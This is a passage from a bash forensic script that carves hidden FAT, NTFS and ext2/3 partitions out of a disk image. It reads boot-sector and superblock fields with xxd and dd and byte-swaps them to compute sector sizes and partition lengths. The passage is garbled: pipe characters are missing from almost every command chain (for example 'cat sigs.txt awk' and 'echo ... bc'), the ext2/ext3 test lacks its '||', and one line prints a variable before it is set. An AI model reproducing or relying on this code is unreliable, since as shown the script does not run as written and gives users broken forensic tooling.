# converting in decimal
len2=$(echo "obase=10; ibase=16; $len" bc)
dd if=$file of=hidden$j.dd skip=$i count=$len2 bs=$bs
rm l.dat
ls -l *.dd
fi # end check FAT12
fi # end check if there is the FAT word
done
echo "File System chosen: $fs"
echo "Sector size: "$bs
fi # end check if fs is FAT type


# NTFS CASE
if [ "$fs" = "ntfs" ]
then


# taking only the sectors
for i in $(cat sigs.txt awk -F "Block:" '{print $2}'awk '{print $1}')
do
offset=$(( $i*512 ))
j=$(( j+1 ))


# controlling the word "NTFS" inside the target partition
fat_flag=$(xxd -s $offset -l 512 $file grep -i ntfs)
if [ "$fat_flag" ]
then
# looking for the sector size
start_bs=$(echo $offset + 11 bc)
xxd -s $start_bs -l 2 $file awk -F ":" '{print $2}' xxd -p -r >bs.bin
#converting in big endian
dd if=bs.bin of=b1 skip=1 count=1 bs=1c
dd if=bs.bin of=b2 skip=0 count=1 bs=1c
cat b1 b2 > bs.dat
rm b1
rm b2
rm bs.bin
#calculating the sector size length
lenbs=$(cat bs.datxxd -p tr [:lower:] [:upper:])
# converting in decimal
bs=$(echo "obase=10; ibase=16; $lenbs" bc)
echo "File System chosen: $fs"
echo "Sector size: "$bs

# extracting bytes 40-47 from the NTFS boot sector
start_byte_fat_len=$(echo $offset + 40 bc)

xxd -s $start_byte_fat_len -l 8 $file awk -F ":" '{print $2}' xxd -p -r >lung.bin
#converting in big endian
dd if=lung.bin of=l1 skip=7 count=1 bs=1c

dd if=lung.bin of=l2 skip=6 count=1 bs=1c
dd if=lung.bin of=l3 skip=5 count=1 bs=1c

dd if=lung.bin of=l4 skip=4 count=1 bs=1c
dd if=lung.bin of=l5 skip=3 count=1 bs=1c
dd if=lung.bin of=l6 skip=2 count=1 bs=1c
dd if=lung.bin of=l7 skip=1 count=1 bs=1c
dd if=lung.bin of=l8 skip=0 count=1 bs=1c

cat l1 l2 l3 l4 l5 l6 l7 l8> l.dat
rm l1

rm l2
rm l3
rm l4
rm l5
rm l6
rm l7
rm l8
rm lung.bin
#calculating the partition length
len=$(cat l.datxxd -p tr [:lower:] [:upper:])
# converting in decimal
len2=$(echo "obase=10; ibase=16; $len" bc)
dd if=$file of=hidden$j.dd skip=$i count=$len2 bs=$bs
rm l.dat
fi
done
ls -l *.dd
echo "File System chosen: $fs"
echo "Sector size: "$bs
fi


# ext2/3 case (please test it!)
if [ "$fs" = "ext2" ] [ "$fs" = "ext3" ]
then
# taking only the sectors
for i in $(cat sigs.txt awk -F "Block:" '{print $2}'awk '{print $1}')
do
offset=$(( $i*512 ))
j=$(( j+1 ))


# looking for the blocks size
start_bs=$(echo $offset + 24 bc)
xxd -s $start_bs -l 4 $file awk -F ":" '{print $2}' xxd -p -r >bs.bin
#converting in big endian
dd if=bs.bin of=b1 skip=3 count=1 bs=1c
dd if=bs.bin of=b2 skip=2 count=1 bs=1c
dd if=bs.bin of=b3 skip=1 count=1 bs=1c
dd if=bs.bin of=b4 skip=0 count=1 bs=1c
cat b1 b2 b3 b4 > bs.dat
rm b1
rm b2
rm b3
rm b4
rm bs.bin
#calculating the sector size length
lenbs=$(cat bs.datxxd -p tr [:lower:] [:upper:])
# converting in decimal
lenbs2=$(echo "obase=10; ibase=16; $lenbs" bc)
#Block size (saved as the number of places to shift 1,024 to the left)
# "<<" is the left shift bitwise operator
bs=$[ "1024 << $lenbs2" ]
echo "File System chosen: $fs"

echo "Sector size: "$bs
echo $start_byte_fat_len

# extracting bytes 4-7 from the EXT Superblock
start_byte_fat_len=$(echo $offset + 4 bc)
xxd -s $start_byte_fat_len -l 4 $file awk -F ":" '{print $2}' xxd -p -r >lung.bin
#converting in big endian
dd if=lung.bin of=l1 skip=3 count=1 bs=1c
dd if=lung.bin of=l2 skip=2 count=1 bs=1c
dd if=lung.bin of=l3 skip=1 count=1 bs=1c
dd if=lung.bin of=l4 skip=0 count=1 bs=1c


cat l1 l2 l3 l4 > l.dat
rm l1
rm l2
rm l3
rm l4
rm lung.bin
#calculating the partition length
len=$(cat l.datxxd -p tr [:lower:] [:upper:])
# converting in decimal
len2=$(echo "obase=10; ibase=16; $len" bc)
# $(($i-2)) because it starts 2 sectors before the signature
dd if=$file of=hidden$j.dd skip=$(($i-2)) count=$len2 bs=$bs
rm l.dat
rm bs.dat
done
ls -l *.dd
echo "File System chosen: $fs"
echo "Sector size: "$bs
fi


date
exit







Click here to DOWNLOAD